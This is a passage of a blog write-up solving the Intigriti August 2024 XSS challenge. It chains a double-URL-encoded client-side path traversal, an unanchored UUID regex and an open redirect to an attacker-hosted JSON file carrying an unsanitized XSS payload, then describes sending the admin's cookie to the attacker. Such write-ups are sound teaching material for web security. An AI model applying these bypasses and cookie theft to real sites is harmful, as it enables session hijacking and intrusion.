</span></span><span style="display:flex;"><span>                    <span style="color:#ff5c57">document</span>.getElementById(
</span></span><span style="display:flex;"><span>                        <span style="color:#5af78e">&#34;debug-content-section&#34;</span>
</span></span><span style="display:flex;"><span>                    ).style.display <span style="color:#ff6ac1">=</span> <span style="color:#5af78e">&#34;block&#34;</span>;
</span></span><span style="display:flex;"><span>                }
</span></span><span style="display:flex;"><span>            });
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>    
</span></span></code></pre></td></tr></table>
</div>
</div><hr>
<p>When our note is fetched, the server returns a JSON object containing the note&rsquo;s content. This content is then rendered using innerHTML, with DOMPurify applied to sanitize it, effectively preventing XSS.</p>
<p>However, if the JSON response includes a debug key, its value is rendered using <strong>outerHTML</strong> without any sanitization, which can be used to get XSS .</p>
<hr>
<div class="highlight"><div style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">3
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">4
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">5
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">6
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-js" data-lang="js"><span style="display:flex;"><span> <span style="color:#ff6ac1">if</span> (data.debug) {
</span></span><span style="display:flex;"><span>        <span style="color:#ff5c57">document</span>.getElementById(<span style="color:#5af78e">&#34;debug-content&#34;</span>).outerHTML <span style="color:#ff6ac1">=</span> data.debug;
</span></span><span style="display:flex;"><span>        <span style="color:#ff5c57">document</span>.getElementById(
</span></span><span style="display:flex;"><span>            <span style="color:#5af78e">&#34;debug-content-section&#34;</span>
</span></span><span style="display:flex;"><span>        ).style.display <span style="color:#ff6ac1">=</span> <span style="color:#5af78e">&#34;block&#34;</span>;
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></td></tr></table>
</div>
</div><hr>
<h2 id="-attack-plan">🥷 Attack plan</h2>
<p>The plan is to manipulate the fetch request so that it returns a JSON object containing a <strong>debug</strong> key. However, the server only responds with a JSON object that includes a <strong>content key</strong> and the note’s content, with no way to modify this server response directly. The only method to achieve this would be to return the <strong>modified JSON from our own server</strong>.</p>
<p>However, we only have CSPT (Client-Side Path Traversal) at our disposal, which allows us to control the path of the fetch() request. This means we can only direct the fetch to different endpoints .</p>
<hr>
<div class="highlight"><div style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-js" data-lang="js"><span style="display:flex;"><span>fetch(<span style="color:#5af78e">&#34;/api/notes/fetch/&#34;</span> <span style="color:#ff6ac1">+</span> <span style="color:#ff5c57">decodeURIComponent</span>(noteId))
</span></span></code></pre></td></tr></table>
</div>
</div><hr>
<p>Unless there is an <strong>Open-Redirect</strong> in any of the endpoints !!</p>
<p>If we have an <strong>Open-redirect</strong>, we can use the CSPT to redirect the fetch() request to the endpoint having open-redirect, and then use the open redirect to send the request to our attacker&rsquo;s server. From there, we can respond with a JSON object that includes the debug key, containing our XSS payload.</p>
<p><img src="/img/post/IntigritiXssAug2024/diagram.png" alt="finalXSS"></p>
<h2 id="open-redirect">Open Redirect</h2>
<p>There is an endpoint named <code>/contact</code> that accepts a query parameter called <strong>return</strong>. This endpoint will redirect the user to the URL specified by the value of the return parameter.</p>
<hr>
<div class="highlight"><div style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 1
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 2
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 3
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 4
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 5
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 6
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 7
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 8
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 9
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">10
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">11
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">12
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">13
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-py" data-lang="py"><span style="display:flex;"><span><span style="color:#ff9f43">@main.route</span>(<span style="color:#5af78e">&#39;/contact&#39;</span>, methods<span style="color:#ff6ac1">=</span>[<span style="color:#5af78e">&#39;GET&#39;</span>, <span style="color:#5af78e">&#39;POST&#39;</span>])
</span></span><span style="display:flex;"><span><span style="color:#ff6ac1">def</span> <span style="color:#57c7ff">contact</span>():
</span></span><span style="display:flex;"><span>    form <span style="color:#ff6ac1">=</span> ContactForm()
</span></span><span style="display:flex;"><span>    return_url <span style="color:#ff6ac1">=</span> request<span style="color:#ff6ac1">.</span>args<span style="color:#ff6ac1">.</span>get(<span style="color:#5af78e">&#39;return&#39;</span>)
</span></span><span style="display:flex;"><span>    <span style="color:#ff6ac1">if</span> request<span style="color:#ff6ac1">.</span>method <span style="color:#ff6ac1">==</span> <span style="color:#5af78e">&#39;POST&#39;</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#ff6ac1">if</span> form<span style="color:#ff6ac1">.</span>validate_on_submit():
</span></span><span style="display:flex;"><span>            flash(<span style="color:#5af78e">&#39;Thank you for your message!&#39;</span>, <span style="color:#5af78e">&#39;success&#39;</span>)
</span></span><span style="display:flex;"><span>            <span style="color:#ff6ac1">if</span> return_url <span style="color:#ff6ac1">and</span> is_safe_url(return_url):
</span></span><span style="display:flex;"><span>                <span style="color:#ff6ac1">return</span> redirect(return_url)
</span></span><span style="display:flex;"><span>            <span style="color:#ff6ac1">return</span> redirect(url_for(<span style="color:#5af78e">&#39;main.home&#39;</span>))
</span></span><span style="display:flex;"><span>    <span style="color:#ff6ac1">if</span> return_url <span style="color:#ff6ac1">and</span> is_safe_url(return_url):
</span></span><span style="display:flex;"><span>        <span style="color:#ff6ac1">return</span> redirect(return_url)
</span></span><span style="display:flex;"><span>    <span style="color:#ff6ac1">return</span> render_template(<span style="color:#5af78e">&#39;contact.html&#39;</span>, form<span style="color:#ff6ac1">=</span>form, return_url<span style="color:#ff6ac1">=</span>return_url)
</span></span></code></pre></td></tr></table>
</div>
</div><hr>
<p>So now we can redirect to the attackers site by just giving the attacker site as the return query parameter.</p>
<hr>
<div class="highlight"><div style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-py" data-lang="py"><span style="display:flex;"><span>                  <span style="color:#ff6ac1">/</span>contact<span style="color:#ff5c57">?</span><span style="color:#ff6ac1">return</span><span style="color:#ff6ac1">=</span>https:<span style="color:#ff6ac1">//</span>attacker<span style="color:#ff6ac1">-</span>site<span style="color:#ff6ac1">.</span>com
</span></span></code></pre></td></tr></table>
</div>
</div><hr>
<h2 id="bypassing-the-cspt-filters">Bypassing the CSPT Filters</h2>
<p>Now that we have Open-Redirect in the /contact endpoint all we have to do is path traverse to that endpoint using CSPT.However we have to bypass a few checks for that.</p>
<ul>
<li>The note uuid check -&gt; <strong>isValidUUID()</strong> function</li>
<li>Path traversal check -&gt;  <strong>noteId.includes(&quot;../&quot;)</strong></li>
</ul>
<h3 id="bypassing-isvaliduuid">Bypassing isValidUUID</h3>
<p>Looking a bit closer at the <strong>isValidUUID()</strong> function, we can see that it validates UUIDs using a regular expression.</p>
<hr>
<div class="highlight"><div style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">3
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">4
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">5
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-js" data-lang="js"><span style="display:flex;"><span><span style="color:#ff5c57">function</span> isValidUUID(noteId) {
</span></span><span style="display:flex;"><span>        <span style="color:#ff6ac1">const</span> uuidRegex <span style="color:#ff6ac1">=</span>
</span></span><span style="display:flex;"><span>            <span style="color:#5af78e">/[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i</span>;
</span></span><span style="display:flex;"><span>        <span style="color:#ff6ac1">return</span> uuidRegex.test(noteId);
</span></span><span style="display:flex;"><span>    }
</span></span></code></pre></td></tr></table>
</div>
</div><hr>
<p>Here the Regex <code>[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$</code> only ensures that the UUID pattern appears at the end of the string. <strong>So there can be any prefix to this uuid , that means we can give ../../ before the uuid .</strong></p>
<hr>
<div class="highlight"><div style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>../82652102-973d-429d-82e0-245a4fbfd6cb 
</span></span></code></pre></td></tr></table>
</div>
</div><hr>
<p>To ensure that it was a proper UUID the regex should have included a <code>^</code>
in the beginnning like this.</p>
<hr>
<div class="highlight"><div style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>/^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i
</span></span></code></pre></td></tr></table>
</div>
</div><hr>
<p>So we can do CSPT to the /contact endpoint like this.</p>
<hr>
<div class="highlight"><div style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>/view?note=../../../contact?return=http://attack&amp;82652102-973d-429d-82e0-245a4fbfd6cb
</span></span></code></pre></td></tr></table>
</div>
</div><hr>
<p>However ../ was still <strong>blocked !!!</strong></p>
<h3 id="bypassing-the-path-traversal-check">Bypassing the Path traversal check</h3>
<p>Upon looking closer, you can see that after the noteId is being checked, it is URL-decoded within the fetch function.</p>
<hr>
<div class="highlight"><div style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 1
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 2
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 3
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 4
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 5
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 6
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 7
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 8
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 9
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">10
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-js" data-lang="js"><span style="display:flex;"><span><span style="color:#ff6ac1">if</span> (noteId.includes(<span style="color:#5af78e">&#34;../&#34;</span>)) {
</span></span><span style="display:flex;"><span>            showFlashMessage(<span style="color:#5af78e">&#34;Input not allowed!&#34;</span>, <span style="color:#5af78e">&#34;danger&#34;</span>);
</span></span><span style="display:flex;"><span>            <span style="color:#ff6ac1">return</span>;
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>        fetch(<span style="color:#5af78e">&#34;/api/notes/fetch/&#34;</span> <span style="color:#ff6ac1">+</span> <span style="color:#ff5c57">decodeURIComponent</span>(noteId), {
</span></span><span style="display:flex;"><span>            method<span style="color:#ff6ac1">:</span> <span style="color:#5af78e">&#34;GET&#34;</span>,
</span></span><span style="display:flex;"><span>            headers<span style="color:#ff6ac1">:</span> {
</span></span><span style="display:flex;"><span>                <span style="color:#5af78e">&#34;X-CSRFToken&#34;</span><span style="color:#ff6ac1">:</span> csrf_token,
</span></span><span style="display:flex;"><span>            },
</span></span><span style="display:flex;"><span>        })
</span></span></code></pre></td></tr></table>
</div>
</div><hr>
<p>So we can easily bypass this check by just double urlencoding the noteId.</p>
<hr>
<div class="highlight"><div style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>view=..%252F..%252F..%252Fcontact?return=http://attacker&amp;UUID
</span></span></code></pre></td></tr></table>
</div>
</div><hr>
<p>So during the <strong>noteId.includes(&quot;../&quot;)</strong> check, the noteId will be <strong>..%2F..%2Fcontact</strong>, so the check will return <strong>false</strong>. However, when fetch() is called, noteId gets URL-decoded with decodeURIComponent(noteId), turning it into <strong>../../../contact</strong>.</p>
<h2 id="--final-payloads">🚀  Final Payloads</h2>
<p>Now that we&rsquo;ve bypassed both security checks, let&rsquo;s combine everything together.</p>
<ul>
<li><strong>Regex Bypass</strong>: By using ../../../ as a prefix to the UUID, we can bypass the regex validation.</li>
<li><strong>Path Traversal Check Bypass</strong>: Double URL encoding the payload allows us to bypass the path traversal check.</li>
</ul>
<p>With these steps, we can direct the fetch request to /contacts, which will <strong>trigger an Open Redirect to our attacker&rsquo;s server</strong>. The server responds with JSON containing a debug key with the XSS payload. This payload is then inserted into the outerHTML, leading to XSS.</p>
<hr>
<div class="highlight"><div style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>..%252F..%252F..%252Fcontact?return=https://attacker/exp.json%26e447f4e1-f7c9-439c-8378-b65b83189b60
</span></span></code></pre></td></tr></table>
</div>
</div><hr>
<p>On the attacker’s server, we need to return a JSON object with the key debug and our XSS payload as the value.</p>
<hr>
<div class="highlight"><div style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{ <span style="color:#ff6ac1">&#34;debug&#34;</span>: <span style="color:#5af78e">&#34;&lt;img src=x onerror=alert()&gt;&#34;</span>} <span style="color:#78787e">// for simple alert
</span></span></span></code></pre></td></tr></table>
</div>
</div><hr>
<h2 id="-exploit-">💀 Exploit !!</h2>
<p><strong>Finally It works!!</strong></p>
<p><img src="/img/post/IntigritiXssAug2024/xss.png" alt="image"></p>
<p>To obtain the flag stored in the admin&rsquo;s cookie, we can simply access <strong>document.cookie</strong> within the XSS payload. Once we have the cookie, we can send it to our server and solve the challenge.</p>

        
          <div class="blog-tags">
            
              <a href="https://Alfinj0se.github.io//tags/writeups/">writeups</a>&nbsp;
            
          </div>
        

        

        
          
            
          

          
                  <h4 class="see-also">See also</h4>
                  <ul>
                
                
                    <li><a href="/posts/intigritixssjuly2024/">Intigriti 0724 XSS Challenge</a></li>
                
                    <li><a href="/posts/kitctf2024/">Flag Remover - KitCTF 2024</a></li>
                
                    <li><a href="/posts/mochactf-2024/">Mocha CTF 2024 Web Writeups</a></li>
                
                    <li><a href="/posts/angstromctf2024/">WaterMark as a Service AngstromCTF</a></li>
                
                    <li><a href="/posts/paaad-hackluctf2023/">päääd - Hack.lu CTF 2023 </a></li>
                
              </ul>

          
        
      </article>

      
        <ul class="pager blog-pager">
          
            <li class="previous">
              <a href="https://Alfinj0se.github.io/posts/intigritixssjuly2024/" data-toggle="tooltip" data-placement="top" title="Intigriti 0724 XSS Challenge">&larr; Previous Post</a>
            </li>
          
          
        </ul>
      


      

    </div>
  </div>
</div>

      
<footer>
  <div class="container">
    
    <div class="row">
      <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
        <ul class="list-inline text-center footer-links">
          
              <li>
		
		  <a href="https://github.com/AlfinJ0se/" title="GitHub">
		
                  <span class="fa-stack fa-lg">
                    <i class="fas fa-circle fa-stack-2x"></i>
                    <i class="fab fa-github fa-stack-1x fa-inverse"></i>
                  </span>
                </a>
              </li>
              <li>
		
		  <a href="https://twitter.com/Alfinjoseph19" title="Twitter">
		
                  <span class="fa-stack fa-lg">
                    <i class="fas fa-circle fa-stack-2x"></i>
                    <i class="fab fa-twitter fa-stack-1x fa-inverse"></i>
                  </span>
                </a>
              </li>
              <li>
		
		  <a href="https://discord.gg/alfin3133" title="Discord">
		
                  <span class="fa-stack fa-lg">
                    <i class="fas fa-circle fa-stack-2x"></i>
                    <i class="fab fa-discord fa-stack-1x fa-inverse"></i>
                  </span>
                </a>
              </li>
          
        </ul>
        <p class="credits copyright text-muted">
          
            
              <a href="https://Alfinj0se.github.io">Alfin Joseph</a>
            
          

          &nbsp;&bull;&nbsp;&copy;
          
            2024
          

          
            &nbsp;&bull;&nbsp;
            <a href="https://Alfinj0se.github.io/">Alfins Notes</a>
          
        </p>
        
        <p class="credits theme-by text-muted">
          <a href="https://gohugo.io">Hugo v0.126.1</a> powered &nbsp;&bull;&nbsp; Theme <a href="https://github.com/halogenica/beautifulhugo">Beautiful Hugo</a> adapted from <a href="https://deanattali.com/beautiful-jekyll/">Beautiful Jekyll</a>
          
        </p>
      </div>
    </div>
  </div>
</footer><script defer src="https://cdn.jsdelivr.net/npm/katex@0.16.7/dist/katex.min.js" integrity="sha384-G0zcxDFp5LWZtDuRMnBkk3EphCK1lhEf4UEyEM693ka574TZGwo4IWwS6QLzM/2t" crossorigin="anonymous"></script>
<script defer src="https://cdn.jsdelivr.net/npm/katex@0.16.7/dist/contrib/auto-render.min.js" integrity="sha384-+VBxd3r6XgURycqtZ117nYw44OOcIax56Z4dCRWbxyPt0Koah1uHoK0o4+/RRE05" crossorigin="anonymous" onload="renderMathInElement(document.body);"></script>
<script src="https://code.jquery.com/jquery-3.7.0.slim.min.js" integrity="sha384-w5y/xIeYixWvfM+A1cEbmHPURnvyqmVg5eVENruEdDjcyRLUSNej7512JQGspFUr" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@3.4.1/dist/js/bootstrap.min.js" integrity="sha384-aJ21OjlMXNL5UyIl/XNwTMqvzeRMZH2w8c5cRVpzpU8Y5bApTppSuUkhZXN0VxHd" crossorigin="anonymous"></script>

<script src="https://Alfinj0se.github.io/js/main.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/photoswipe/4.1.2/photoswipe.min.js" integrity="sha384-QELNnmcmU8IR9ZAykt67vGr9/rZJdHbiWi64V88fCPaOohUlHCqUD/unNN0BXSqy" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/photoswipe/4.1.2/photoswipe-ui-default.min.js" integrity="sha384-m67o7SkQ1ALzKZIFh4CiTA8tmadaujiTa9Vu+nqPSwDOqHrDmxLezTdFln8077+q" crossorigin="anonymous"></script><script src="https://Alfinj0se.github.io/js/load-photoswipe.js"></script>









    
  </body>
</html>

